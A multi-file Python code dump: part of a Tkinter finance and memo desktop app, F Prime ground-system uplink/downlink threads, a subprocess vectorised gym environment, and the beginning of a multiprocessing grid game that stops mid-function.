self.l5.config(bg='white',fg='black')
if self.data==1:
root.config(bg='grey')
self.show.config(bg='grey')
self.splash_frame.config(bg='grey')
self.toolwindow.config(bg='grey')
self.toolwindow1.config(bg='grey')
self.cancel.config(bg='grey')
self.minimize.config(bg='grey')
self.visible.config(bg='grey',activebackground='grey')
self.reg.config(bg='grey')
self.logb.config(bg='grey')
self.loginb.config(bg='grey',activebackground='grey')
self.login.config(bg='grey')
self.l.config(bg='grey',fg='white')
self.l2.config(bg='grey',fg='white')
self.l3.config(bg='grey',fg='white')
self.l4.config(bg='grey',fg='white')
self.l5.config(bg='grey',fg='white')
if self.data==2:
root.config(bg='black')
self.show.config(bg='black')
self.toolwindow.config(bg='black')
self.toolwindow1.config(bg='black')
self.cancel.config(bg='black')
self.minimize.config(bg='black')
self.splash_frame.config(bg='black')
self.reg.config(bg='black')
self.logb.config(bg='black')
self.loginb.config(bg='black')
self.visible.config(bg='black',activebackground='black')
self.login.config(bg='black')
self.l.config(bg='black',fg='white')
self.l2.config(bg='black',fg='white')
self.l3.config(bg='black',fg='white')
self.l4.config(bg='black',fg='white')
self.l5.config(bg='black',fg='white')
if self.data==3:
root.config(bg='#151930')
self.show.config(bg='#151930')
self.splash_frame.config(bg='#151930')
self.reg.config(bg='#151930')
self.logb.config(bg='#151930')
self.toolwindow.config(bg='#151930')
self.toolwindow1.config(bg='#151930')
self.cancel.config(bg='#151930')
self.minimize.config(bg='#151930')
self.visible.config(bg='#151930',activebackground='#151930')
self.login.config(bg='#151930')
self.loginb.config(bg='#151930',activebackground='#151930')
self.l.config(bg='#151930',fg='white')
self.l2.config(bg='#151930',fg='white')
self.l3.config(bg='#151930',fg='white')
self.l4.config(bg='#151930',fg='white')
self.l5.config(bg='#151930',fg='white')
if self.data==4:
root.config(bg='white')
self.show.config(bg='white')
self.splash_frame.config(bg='white')
self.reg.config(bg='white')
self.logb.config(bg='white')
self.toolwindow.config(bg='white')
self.toolwindow1.config(bg='white')
self.cancel.config(bg='white')
self.minimize.config(bg='white')
self.login.config(bg='white')
self.visible.config(bg='white',activebackground='white')
self.loginb.config(bg='white',activebackground='white')
self.l.config(bg='white',fg='black')
self.l2.config(bg='white',fg='black')
self.l3.config(bg='white',fg='black')
self.l4.config(bg='white',fg='black')
self.l4.config(bg='white',fg='black')
#function to change the theme fogotton credentials functions
def config_themes4(self):
if self.data==0:
self.sp.config(bg='white')
self.forgotten.config(bg='white')
if self.data==1:
self.sp.config(bg='grey')
self.forgotten.config(bg='grey')
if self.data==2:
self.sp.config(bg='black')
self.forgotten.config(bg='black')
if self.data==3:
self.sp.config(bg='#151930')
self.forgotten.config(bg='#151930')
if self.data==4:
self.sp.config(bg='white')
self.forgotten.config(bg='white')
#memo class frame
class Memo(Financial):
def __init__(self,master):
self.master=master
def mem(self):
m = Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\bmb.png")
m = m.resize((450,400))#resized
m = ImageTk.PhotoImage(m)
self.top3=Toplevel()
self.top3.attributes('-fullscreen',True)
self.top3.wm_title('Memo')
self.top3.iconphoto(False,m)
self.top3.wm_geometry('600x400')
men=Menu(self.top3)
self.top3.config(menu=men)
f_menu=Menu(men,tearoff=0)
e_menu=Menu(men,tearoff=0)
men.add_cascade(label='File',menu=f_menu)
men.add_cascade(label='Edit',menu=e_menu)
p_menu=Menu(men,tearoff=0)
pa_menu=Menu(men,tearoff=0)
men.add_cascade(label='Paragraph',menu=pa_menu)
men.add_cascade(label='Print',menu=p_menu)
p_menu.add_command(label='Print')
e_menu.add_command(label='Copy')
e_menu.add_command(label='Paste',command=self.insert_pic)
e_menu.add_command(label='Cut')
e_menu.add_command(label='Undo')
e_menu.add_command(label='Redo')
f_menu.add_command(label='Save')
f_menu.add_command(label='SaveAs')
f_menu.add_command(label='Delete')
f_menu.add_command(label='Open',command=self.open)
pa_menu.add_command(label='Indented')
pa_menu.add_command(label='Block')
pa_menu.add_command(label='Centre')
pa_menu.add_command(label='Left')
pa_menu.add_command(label='Right')
l1=Label(self.top3,text='Ready',font=('Helvetica',12))
l1.grid(sticky='es')
sc3=Scrollbar(self.top3,orient='vertical')
self.textbox=Text(self.top3,font=('Helvetica',13),width=100,height=32,selectbackground='powder blue',
undo=True,selectforeground='black',yscrollcommand=sc3.set)
self.textbox.grid(row=0,column=0)
sc3.config(command=self.textbox.yview)
sc3.grid(row=0,column=1,sticky='ns')
def open(self):
self.file=askopenfilename(parent=self.top3,title='Open File',filetypes=(['Text Files','.txt'],['PDF','.pdf'],['Microsoft Doc','.docx'],['Retrieve Text From Any File','*']))
if self.file:
print(self.file)
the_file=open(self.file)
self.textbox.insert(1.0,the_file.read())
def insert_pic(self):
self.file2=askopenfilename(parent=self.top3,title='insert image',filetypes=(['PNG','.png'],['JPEG','.jpg'],['Bitmap','.bmp']))
if self.file2:
in_image=Image.open(self.file2)
in_image=ImageTk.PhotoImage(in_image)
self.textbox.image_create(1.1,image=in_image)
self.textbox.in_image=in_image
#The app Main menu
class Main(Financial):
def __init__(self,object):
#self.to=object.top
self.f=object.showit
self.main=main
self.nam=object.data
self.screen1=round(root.winfo_screenheight()/27)
self.screen2=round(root.winfo_screenheight()-self.screen1)
self.icon1=Canvas(root,highlightthickness=0,width=root.winfo_screenwidth(),height=self.screen2+10)
self.fra1=Frame(self.icon1,highlightthickness=0)
self.maxi=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\maximize.png")
self.t =Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\suunday.png")
self.z=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\settings.png")
self.m = Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\bmb.png")
self.y=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\Monthly.png")
self.label = Button(self.fra1, text='Financial Analysis', font=('blue', 13, 'bold'),borderwidth=0,bd=0,command=master.get)
self.b = Button(self.fra1, borderwidth=0,command=master.get)
memory=sqlite3.connect(':memory:')
mem=memory.cursor()
mem.execute("CREATE TABLE icon(image TEXT)")
#mem.execute("INSERT INTO icon(image) VALUES(?)",[sqlite3.Binary(t)])
memory.commit()
def display(self):
self.maxi=ImageTk.PhotoImage(self.maxi)
self.toolwindow1=Canvas(root,width=root.winfo_screenwidth(),height=self.screen1,bg='black',highlightthickness=0)
self.toolwindow=Frame(self.toolwindow1,bg='black')
self.maximize=Button(self.toolwindow,image=self.maxi,bd=0,borderwidth=0,bg='black')
self.maximize.grid(row=0,sticky='e')
root.wm_title('F-BOX')
root.geometry('{}x{}+-0+1'.format(root.winfo_screenwidth(),root.winfo_screenheight()-1))
root.after(10,lambda:set(root))
my4=Hovertip(self.b,'Daily\nFinancial Analysis')
self.v=StringVar()
self.v.set('grey')
self.f.grid_forget()
root.resizable(1,1)
#F-analysis icon image
self.b.grid(row=0,column=0,sticky='nsew')
self.label.grid(row=1,column=0,sticky='nsew')
#memo icon image
#memo button trigger
self.b2 = Button(self.fra1, borderwidth=0,command=main.mem)
#self.b2.self.m=self.m
self.b2.grid(row=0,column=1,padx=round(root.winfo_screenheight()/18),sticky='nsew')
my1=Hovertip(self.b2,'Text Editor',hover_delay=500)
# memo button trigger 2
self.label2 = Button(self.fra1, text='Memo', font=('blue', 12, 'bold'),borderwidth=0,bd=0,command=main.mem)
self.label2.grid(row=1, column=1,padx=round(root.winfo_screenheight()/18),sticky='nsew')
#f-analysis button trigger 2
#f-analysis button trigger
#monthly analysis button image icon
self.b3=Button(self.fra1,borderwidth=0,bd=0)
self.b3.grid(row=0,column=2,padx=round(root.winfo_screenheight()/18),sticky='nsew')
my2=Hovertip(self.b3,'Monthly Report',hover_delay=500)
self.label3=Button(self.fra1,text='Monthly Analysis',font=('Time',13,'bold'),borderwidth=0,bd=0)
self.label3.grid(row=1,column=2,padx=round(root.winfo_screenheight()/18),sticky='nsew')
#settings buttin image icon
self.se=Button(self.fra1,borderwidth=0,padx=round(root.winfo_screenheight()/18),command=master.bind)
self.label4=Button(self.fra1,text='Settings',font=('Time',13,'bold'),borderwidth=0,bd=0,command=master.bind)
self.se.grid(row=0,column=3,padx=round(root.winfo_screenheight()/18),sticky='nsew')
my3=Hovertip(self.se,'Setings And Configuration',hover_delay=500)
self.label4.grid(row=1,column=3,sticky='nsew')
#App icon image
        p = Image.open(r"D:\FES2.png")  # raw string so the backslash is not treated as an escape
p = p.resize((50, 50))
p = ImageTk.PhotoImage(p)
root.iconphoto(False, p)
root.config(bg=self.v.get())
#self.fra1.grid(row=1,column=0,sticky='nsew')
#self.fra2.grid(row=1,column=1,sticky='nsew')
#self.fra3.grid(row=1,column=2,sticky='nsew')
#self.fra4.grid(row=1,column=3,sticky='nsew')
Grid.columnconfigure(self.fra1 ,0,weight=1)
Grid.columnconfigure(self.fra1,2,weight=1)
Grid.rowconfigure(self.fra1,0,weight=1)
Grid.rowconfigure(self.fra1,1,weight=1)
Grid.columnconfigure(self.fra1,1,weight=1)
Grid.columnconfigure(self.fra1,3,weight=1)
threading.Thread(target=root.update).start()
self.geo=root.winfo_width()
self.geo2=root.winfo_height()
#self.print2('e')
self.theme_change()
self.toolwindow1.update_idletasks()
self.icon1.update_idletasks()
self.icon1.grid_propagate(False)
self.toolwindow1.grid_propagate(False)
self.toolwindow1.create_window(1800,round(self.geo2/120),anchor='n',window=self.toolwindow)
self.icon1.create_window(0,round(root.winfo_screenheight()/4.7),anchor='w',window=self.fra1)
self.toolwindow1.grid(row=0,column=0,sticky='n')
self.icon1.grid(row=1,column=0,sticky='nsew')
root.bind('<Configure>',self.print2)
root.after_idle(root.focus_force)
#root.state('zoomed')
def theme_change(self):
if self.nam==0:
root.config(bg='grey')
self.b2.config(bg='grey',activebackground='grey')
self.label2.config(bg='grey',activebackground='grey',fg='white')
self.label.config(bg='grey',activebackground='grey',fg='white')
self.b.config(bg='grey',activebackground='grey')
self.b3.config(bg='grey',activebackground='grey')
self.label3.config(bg='grey',activebackground='grey',fg='white')
self.se.config(bg='grey',activebackground='grey')
self.label4.config(bg='grey',activebackground='grey',fg='white')
self.fra1.config(bg='grey')
self.icon1.config(bg='grey')
if self.nam==1:
root.config(bg='grey')
self.b2.config(bg='grey',activebackground='grey')
self.label2.config(bg='grey',activebackground='grey',fg='white')
self.label.config(bg='grey',activebackground='grey',fg='white')
self.b.config(bg='grey',activebackground='grey')
self.b3.config(bg='grey',activebackground='grey')
self.label3.config(bg='grey',activebackground='grey',fg='white')
self.se.config(bg='grey',activebackground='grey')
self.label4.config(bg='grey',activebackground='grey',fg='white')
self.fra1.config(bg='grey')
self.icon1.config(bg='grey')
if self.nam==2:
root.config(bg='black')
self.b2.config(bg='black',activebackground='black')
self.label2.config(bg='black',activebackground='black',fg='white')
self.label.config(bg='black',activebackground='black',fg='white')
self.b.config(bg='black',activebackground='black')
self.b3.config(bg='black',activebackground='black')
self.label3.config(bg='black',activebackground='black',fg='white')
self.se.config(bg='black',activebackground='black')
self.label4.config(bg='black',activebackground='black',fg='white')
self.fra1.config(bg='black')
self.icon1.config(bg='black')
if self.nam==3:
root.config(bg='#151930')
self.b2.config(bg='#151930',activebackground='#151930')
self.label2.config(bg='#151930',activebackground='#151930',fg='white')
self.label.config(bg='#151930',activebackground='#151930',fg='white')
self.b.config(bg='#151930',activebackground='#151930')
self.b3.config(bg='#151930',activebackground='#151930')
self.label3.config(bg='#151930',activebackground='#151930',fg='white')
self.se.config(bg='#151930',activebackground='#151930')
self.label4.config(bg='#151930',activebackground='#151930',fg='white')
self.fra1.config(bg='#151930')
self.icon1.config(bg='#151930')
if self.nam==4:
root.config(bg='white')
self.b2.config(bg='white',activebackground='white')
self.label2.config(bg='white',activebackground='white',fg='black')
self.label.config(bg='white',activebackground='white',fg='black')
self.b.config(bg='white',activebackground='white')
self.b3.config(bg='white',activebackground='white')
self.label3.config(bg='white',activebackground='white',fg='black')
self.se.config(bg='white',activebackground='white')
self.label4.config(bg='white',activebackground='white',fg='black')
self.fra1.config(bg='white')
self.icon1.config(bg='white')
def print2(self,event):
#p=threading.Thread(target=self.print)
#p1=threading.Thread(target=self.print3)
#p2=threading.Thread(target=self.print4)
#p3=threading.Thread(target=self.print5)
#p.start()
#p1.start()
#p2.start()
#p3.start()
#self.print4()
self.print()
self.print3()
self.print4()
self.print5()
#Process(target=self.print4).run()
def resize1(self):
pass
def print(self):
if self.m:
iw,ih=self.m.width,self.m.height
mw,mh=root.winfo_width(),root.winfo_height()
if self.geo==mw:
iw=self.geo//5
ih=self.geo//5
self.ic1 =ImageTk.PhotoImage(self.t.resize((iw, ih)),Image.NEAREST)
self.b.configure(image=self.ic1)
self.label.config(font=('Helvectica',12,'bold'))
else:
iw=mw//5
ih=mw//5
self.ic1 = ImageTk.PhotoImage(self.t.resize((iw, ih)),Image.NEAREST)
self.b.configure(image=self.ic1)
self.label.config(font=('Helvectica',round((mw*0.00625)+3),'bold'))
def print3(self):
if self.m:
iw,ih=self.m.width,self.m.height
mw,mh=root.winfo_width(),root.winfo_height()
if self.geo==mw:
iw=self.geo//5
ih=self.geo//5
self.ic2 = ImageTk.PhotoImage(self.m.resize((iw,ih)),Image.NEAREST)
self.b2.config(image=self.ic2)
self.label2.config(font=('Helvectica',12,'bold'))
else:
iw=mw//5
ih=mw//5
self.ic2= ImageTk.PhotoImage(self.m.resize((iw,ih)),Image.NEAREST)
self.b2.config(image=self.ic2)
self.label2.config(font=('Helvectica',round((mw*0.00625)+3),'bold'))
def print4(self):
if self.m:
iw,ih=self.m.width,self.m.height
mw,mh=root.winfo_width(),root.winfo_height()
if self.geo==mw:
iw=self.geo//5
ih=self.geo//5
self.ic3=ImageTk.PhotoImage(self.y.resize((iw,ih)),Image.NEAREST)
self.b3.config(image=self.ic3)
self.label3.config(font=('Helvectica',12,'bold'))
else:
iw=mw//5
ih=mw//5
self.ic3=ImageTk.PhotoImage(self.y.resize((iw,ih)),Image.NEAREST)
self.b3.config(image=self.ic3)
self.label3.config(font=('Helvectica',round((mw*0.00625)+3),'bold'))
def print5(self):
if self.m:
iw,ih=self.m.width,self.m.height
mw,mh=root.winfo_width(),root.winfo_height()
if self.geo==mw:
iw=self.geo//5
ih=self.geo//5
self.ic4=ImageTk.PhotoImage(self.z.resize((iw,ih)),Image.NEAREST)
self.se.config(image=self.ic4)
self.label4.config(font=('Helvectica',13,'bold'))
else:
iw=mw//5
ih=mw//5
self.ic4=ImageTk.PhotoImage(self.z.resize((iw,ih)),Image.NEAREST)
self.se.config(image=self.ic4)
self.label4.config(font=('Helvectica',round((mw*0.00625)+3),'bold'))
class Task(Main,Financial):
def __init__(self,object1,object2):
self.n=object2.top
self.x=object1.b
self.bc=object1.label
def close(self):
root.deiconify()
self.x.config(command=lambda:self.n.deiconify())
try:
self.n.iconify()
except tkinter.TclError:
pass
class FLASHWINFO(ctypes.Structure):
_fields_=[('cbSize',ctypes.c_uint),
('hwnd',ctypes.c_uint),
('dwFlags',ctypes.c_uint),
('dwTimeout',ctypes.c_uint)]
GWL_EXSTYLE=-20
WS_EX_APPWINDOW=0x00040000
WS_EX_TOOLWINDOW=0x00000080
def close2(event):
root.destroy()
def set(window):
    # Re-style the borderless (overrideredirect) window so Windows shows it in
    # the taskbar: clear WS_EX_TOOLWINDOW, set WS_EX_APPWINDOW, then re-map.
    j=ctypes.windll.user32.GetParent(window.winfo_id())
    style=ctypes.windll.user32.GetWindowLongPtrW(j,GWL_EXSTYLE)
    style=style & ~WS_EX_TOOLWINDOW
    style=style | WS_EX_APPWINDOW
    res=ctypes.windll.user32.SetWindowLongPtrW(j,GWL_EXSTYLE,style)
    window.withdraw()
    window.after(10,lambda:window.deiconify())
#window.grab_set()
#window.attributes('-topmost',True)
count1=0
counter=0
master=Financial(root)
main=Memo(root)
first=Main(master)
second=Task(first,master)
third=Login(master)
lgh=[]
h=[]
h1=[]
h2=[]
h3=[]
h4=[]
h5=[]
h6=[]
h7=[]
h8=[]
h10=[]
h11=[]
test=[]
test2=[]
kist = []
list2=[]
list3=[]
list4=[]
list5=[]
list6=[]
list7=[]
list8=[]
list9=[]
graph=[]
root.bind('<Alt-F4>',close2)
root.update()
#root.bind('<Enter>',master.logined)
if __name__=='__main__':
freeze_support()
root.after(10,lambda:set(root))
third.splash()
mainloop()
|
updown.py
|
""" Uplink and Downlink handling for communications layer
Downlink needs to happen in several stages. First, raw data is read from the adapter. This data is collected in a pool
and the pool is passed to a deframer that extracts frames from this pool. Frames are queued and sent to the ground
side, where they are passed into the ground side handler and on to the other GDS processes. Downlink handles multiple
streams of data: the FSW downlink, and loopback data from the uplink adapter.
Uplink is the reverse, it pulls data in from the ground handler, frames it, and sends it up to the waiting FSW. Uplink
is represented by a single thread, as it is not dealing with multiple streams of data that need to be multiplexed.
"""
import threading
from queue import Queue, Full, Empty
import logging
from fprime.common.models.serialize.numerical_types import U32Type
from fprime_gds.common.utils.data_desc_type import DataDescType
from fprime_gds.common.communication.adapters.base import BaseAdapter
from fprime_gds.common.communication.ground import GroundHandler
from fprime_gds.common.communication.framing import FramerDeframer
DW_LOGGER = logging.getLogger("downlink")
UP_LOGGER = logging.getLogger("uplink")
class Downlinker:
"""Encapsulates communication downlink functions
Handles downlink creating two threads, one to read and deframe, and the other to send data out to the ground side
of the system. It is composed of an adapter used to read from the interface, a deframer that is used to deframe
incoming data, and a ground handler that is used to interact with the ground side of the system.
Two threaded stages are used to multiplex between loopback data and FSW downlink data without the need to busy spin
waiting for data.
"""
def __init__(
self, adapter: BaseAdapter, ground: GroundHandler, deframer: FramerDeframer
):
"""Initialize the downlinker
Constructs a new downlinker object used to run the downlink and deframing operation.
Args:
adapter: adapter used to read raw data from the hardware connection
ground: handles the ground side connection
deframer: deframer used to deframe data from the communication format
"""
self.running = True
self.th_ground = None
self.th_data = None
self.adapter = adapter
self.ground = ground
self.deframer = deframer
self.outgoing = Queue()
def start(self):
""" Starts the downlink pipeline """
self.th_ground = threading.Thread(target=self.sending)
self.th_ground.daemon = True
self.th_ground.start()
self.th_data = threading.Thread(target=self.deframing)
self.th_data.daemon = True
self.th_data.start()
def deframing(self):
"""Deframing stage of downlink
Reads in data from the raw adapter and runs the deframing. Collects data in a pool and continually runs
deframing against it where possible. Then appends new frames into the outgoing queue.
"""
pool = b""
while self.running:
# Blocks until data is available, but may still return b"" if timeout
pool += self.adapter.read()
frames, pool = self.deframer.deframe_all(pool, no_copy=True)
try:
for frame in frames:
self.outgoing.put_nowait(frame)
except Full:
DW_LOGGER.warning("GDS ground queue full, dropping frame")
def sending(self):
"""Outgoing stage of downlink
Adapts the downlink adapter to the rest of the GDS system by draining the outgoing queue and sending those
packets to the rest of the GDS. This uses the ground send_all method.
"""
while self.running:
frames = []
try:
# Blocking read of at least one frame, then drain the entire queue
frames.append(self.outgoing.get(timeout=0.500))
while not self.outgoing.empty():
frames.append(self.outgoing.get_nowait())
except Empty:
pass
self.ground.send_all(frames)
def stop(self):
""" Stop the thread depends will close the ground resource which may be blocking """
self.running = False
def join(self):
""" Join on the ending threads """
for thread in [self.th_data, self.th_ground]:
if thread is not None:
thread.join()
def add_loopback_frame(self, frame):
"""Adds a frame to loopback to ground
Some uplink processes are virtualized on the ground, and thus must loopback packets. This is used for data
handshaking that the FSW may not support.
Args:
frame: frame to loopback to ground
"""
try:
self.outgoing.put_nowait(frame)
except Full:
DW_LOGGER.warning("GDS ground queue full, dropping loopback frame")
class Uplinker:
"""Uplinker used to pull data out of the ground layer and send to FSW
Handles uplink by creating a single thread to read data from the ground layer, frame it, and pass it to the adapter
to the hardware link to flight software. It is composed of an adapter used to write to the interface, a framer
that is used to frame outgoing data, and a ground handler that is used to interact with the ground side of the
system.
Since there is one stream of data the uplink requires only one thread to run.
"""
RETRY_COUNT = 3
def __init__(
self,
adapter: BaseAdapter,
ground: GroundHandler,
framer: FramerDeframer,
loopback: Downlinker,
):
"""Initializes the uplink class
Initialize the uplink class using a hardware adapter, ground handler, and framer.
loopback is used to virtualize the return packet handshake as FSW does not handle that.
Args:
adapter: hardware adapter used to write raw outgoing data bytes
ground: ground handler receiving data from the ground system
framer: framer used to frame wire bytes
loopback: used to return handshake packets
"""
self.th_uplink = None
self.running = True
self.ground = ground
self.adapter = adapter
self.loopback = loopback
self.framer = framer
def start(self):
""" Starts the uplink pipeline """
self.th_uplink = threading.Thread(target=self.uplink)
self.th_uplink.daemon = True
self.th_uplink.start()
def uplink(self):
"""Runs uplink of data from ground to FSW
Primary stage of the uplink process, reads data from the ground adapter, and passes the rest of the data to the
framer, and then onto the adapter to send to FSW. Uplink also generates handshake packets as the current FSW
does not generate handshake packets.
"""
try:
while self.running:
packets = self.ground.receive_all()
for packet in [
packet
for packet in packets
if packet is not None and len(packet) > 0
]:
framed = self.framer.frame(packet)
# Uplink handles synchronous retries
for retry in range(0, Uplinker.RETRY_COUNT):
if self.adapter.write(framed):
self.loopback.add_loopback_frame(
Uplinker.get_handshake(packet)
)
break
else:
UP_LOGGER.warning(
"Uplink failed to send %d bytes of data after %d retries",
len(framed), Uplinker.RETRY_COUNT
)
# An OSError might occur during shutdown and is harmless. If we are not shutting down, this error should be
# propagated up the stack.
except OSError:
if self.running:
raise
def stop(self):
""" Stop the thread depends will close the ground resource which may be blocking """
self.running = False
def join(self):
""" Join on the ending threads """
if self.th_uplink is not None:
self.th_uplink.join()
@staticmethod
def get_handshake(packet: bytes) -> bytes:
"""Gets a handshake raw frame from the last packet
Creates a handshake raw-frame by repeating the contents of the last packet with a handshake descriptor at the
front.
Args:
packet: packet to repeat back out as handshake
Returns:
handshake packet
"""
return U32Type(DataDescType["FW_PACKET_HAND"].value).serialize() + packet
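# ---------------------------------------------------------------------------
# Editor's usage sketch (not part of the original module). It wires Downlinker
# and Uplinker together with in-memory stand-ins; the three stub classes below
# are hypothetical and only implement the methods this module actually calls
# (adapter.read/write, ground.receive_all/send_all, framer.frame/deframe_all).
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    import time

    class _LoopbackAdapter:
        """Pretend hardware link: frames written to it are read back later."""
        def __init__(self):
            self._buffer = b""
        def read(self):
            data, self._buffer = self._buffer, b""
            if not data:
                time.sleep(0.05)  # avoid a tight busy loop in the demo
            return data
        def write(self, frame):
            self._buffer += frame
            return True

    class _MemoryGround:
        """Pretend ground side: hands out one packet, prints what comes back."""
        def __init__(self):
            self._pending = [b"\x00\x01hello"]
        def receive_all(self):
            pending, self._pending = self._pending, []
            if not pending:
                time.sleep(0.05)
            return pending
        def send_all(self, frames):
            for frame in frames:
                print("to ground:", frame)

    class _IdentityFramer:
        """Pretend framer: identity framing, the whole pool is one frame."""
        def frame(self, data):
            return data
        def deframe_all(self, pool, no_copy=False):
            return ([pool] if pool else []), b""

    adapter, ground, framer = _LoopbackAdapter(), _MemoryGround(), _IdentityFramer()
    downlinker = Downlinker(adapter, ground, framer)
    uplinker = Uplinker(adapter, ground, framer, downlinker)
    downlinker.start()
    uplinker.start()
    time.sleep(1.0)  # let the packet and its handshake flow through
    uplinker.stop()
    downlinker.stop()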
|
subproc_vec_env.py
|
import numpy as np
from multiprocessing import Process, Pipe
from . import VecEnv, CloudpickleWrapper
from baselines.common.tile_images import tile_images
from gym.envs.classic_control import rendering
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
try:
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'render':
remote.send(env.render(mode='rgb_array'))
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
except KeyboardInterrupt:
print('SubprocVecEnv worker: got KeyboardInterrupt')
finally:
env.close()
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
        env_fns: list of callables, each returning a gym environment to run in a subprocess
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.viewer = None
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
if self.viewer is not None:
self.viewer.close()
self.closed = True
def render(self, mode='human'):
for pipe in self.remotes:
pipe.send(('render', None))
imgs = [pipe.recv() for pipe in self.remotes]
bigimg = tile_images(imgs)
if mode == 'human':
if self.viewer is None:
self.viewer = rendering.SimpleImageViewer()
self.viewer.imshow(bigimg[:, :, ::-1])
elif mode == 'rgb_array':
return bigimg
else:
raise NotImplementedError
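# ---------------------------------------------------------------------------
# Editor's usage sketch (not part of the original file): a minimal example,
# assuming `gym` and the "CartPole-v1" environment are available; the helper
# below is illustrative only.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    import gym

    def make_env(seed):
        def _thunk():
            env = gym.make("CartPole-v1")
            env.seed(seed)
            return env
        return _thunk

    vec_env = SubprocVecEnv([make_env(i) for i in range(4)])
    obs = vec_env.reset()  # stacked observations, shape (4, obs_dim)
    for _ in range(10):
        actions = [vec_env.action_space.sample() for _ in range(4)]
        obs, rewards, dones, infos = vec_env.step(actions)
    vec_env.close()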
|
game.py
|
import threading
import copy
import time
import random
import multiprocessing as mp
UP = 0
DOWN = 1
LEFT = 2
RIGHT = 3
FREE = 0
WALL = 1
# Game state
STOPPED = 0
STARTED = 1
GAMEOVER = 2
class GameError(Exception):
pass
class PlaygroundError(Exception):
pass
class Playground(object):
FREE = 0
WALL = 1
def __init__(self, map):
if len(map) == 0:
raise PlaygroundError("Map has not rows")
for row in map:
if len(row) != len(map[0]):
raise PlaygroundError("Rows in map nave not got the same length")
self.map = map
self.width = len(map[0])
self.height = len(map)
self.points = []
def add_point(self, x, y):
if not self.is_free(x, y) or self.is_point(x, y):
raise PlaygroundError("Can not add point ({0}, {1})".format(x, y))
self.points.append((x, y))
def del_point(self, x, y):
if self.is_point(x, y):
self.points.remove((x, y))
else:
raise PlaygroundError("Can not remove point ({0}, {1})".format(x, y))
def is_point(self, x, y):
if not self.is_into(x, y):
return False
return (x, y) in self.points
def is_free(self, x, y):
if not self.is_into(x, y):
return False
return self.map[y][x] != WALL
def is_into(self, x, y):
return 0 <= x < self.width and 0 <= y < self.height
class PlayerInfo(object):
def __init__(self, player):
self.name = player.name
self.score = player.score
self.x = player.x
self.y = player.y
self.timeout = player.timeout
class Player(object):
def __init__(self, name, move_func, x=0, y=0):
self.name = name
self.score = 0
self.timeout = 0
self.move_func = move_func
# Function for move:
# move_function(info, ctx = None)
self.x = x
self.y = y
# Save history of all moves
self.history = []
self.history.append((x, y))
self.game_pipe, self.player_pipe = mp.Pipe()
self.process = None
# Are there any pending move requests
self.move_in_progress = False
def set_position(self, x, y):
self.x = x
self.y = y
def get_position(self):
return (self.x, self.y)
def start_player(self):
self.process = mp.Process(target=self.move_processor)
self.process.start()
def stop_player(self, timeout=5):
if self.process and self.process.is_alive():
# Try to terminate process normally
self.game_pipe.send(None)
self.process.join(timeout)
# Send SIGTERM to the process
if self.process.is_alive():
self.process.terminate()
self.process.join(timeout)
def move_processor(self):
print("Process '{}' started".format(self.name))
self.ctx = {}
while True:
try:
request = self.player_pipe.recv()
except Exception as e:
print("ERROR. Process '{}' on pipe receive. {}.".format(self.name, e))
break
if request is None:
break
try:
response = self.move_func(request, self.ctx)
except Exception as e:
print("ERROR. Process '{}' on move function. {}.".format(self.name, e))
break
try:
self.player_pipe.send(response)
except Exception as e:
print("ERROR. Process '{}' on pipe send. {}.".format(self.name, e))
break
print("Process {} stopped".format(self.name))
def move_request(self, gameinfo):
if self.move_in_progress:
self.timeout += 1
return
self.game_pipe.send(gameinfo)
self.move_in_progress = True
def move_result(self):
if self.move_in_progress:
if self.game_pipe.poll():
self.move_in_progress = False
return self.game_pipe.recv()
return None
class Game(object):
def __init__(self, playground, max_move, movetime=1):
self.state = STOPPED
self.playground = playground
self.movetime = movetime
self.max_move = max_move
self.n_move = 0
self.players = {}
self.lock = threading.Lock()
self.game_thread = threading.Thread(target=self._game)
self.stop = False
def add_player(self, player):
if self.state == STOPPED:
self.players[player.name] = player
else:
raise GameError("Can not add player. Game not in STOPPED state")
def do_player_move(self, player, move, start_game=False):
x, y = player.get_position()
if move == UP:
y -= 1
elif move == DOWN:
y += 1
elif move == LEFT:
x -= 1
elif move == RIGHT:
x += 1
elif not start_game:
return
self.lock.acquire()
if self.playground.is_free(x, y):
player.set_position(x, y)
if self.playground.is_point(x, y):
self.playground.del_point(x, y)
player.score += 1
if not start_game:
player.history.append((x, y))
self.lock.release()
def do_move(self):
self.n_move += 1
        l_players = list(self.players.values())
        random.shuffle(l_players)
for player in l_players:
info = self.player_info(player.name)
player.move_request(info)
time.sleep(self.movetime)
for player in l_players:
